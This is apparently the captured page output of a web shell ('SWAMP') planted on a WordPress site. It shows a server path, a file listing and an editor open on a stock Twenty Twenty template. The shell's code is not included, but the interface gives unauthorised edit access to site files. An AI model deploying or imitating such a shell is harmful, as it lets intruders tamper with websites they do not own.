░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/peoplemoverstheatre/wp-content/themes/twentytwenty/templates
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: template-cover.php
<?php /** * Template Name: Cover Template * Template Post Type: post, page * * @package WordPress * @subpackage Twenty_Twenty * @since Twenty Twenty 1.0 */ get_header(); ?> <main id="site-content"> <?php if ( have_posts() ) { while ( have_posts() ) { the_post(); get_template_part( 'template-parts/content-cover' ); } } ?> </main><!-- #site-content --> <?php get_template_part( 'template-parts/footer-menus-widgets' ); ?> <?php get_footer();
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 template-cover.php
PHP
473 B
2023-05-31 03:55
EDIT
📄 template-full-width.php
PHP
202 B
2023-05-31 03:55
EDIT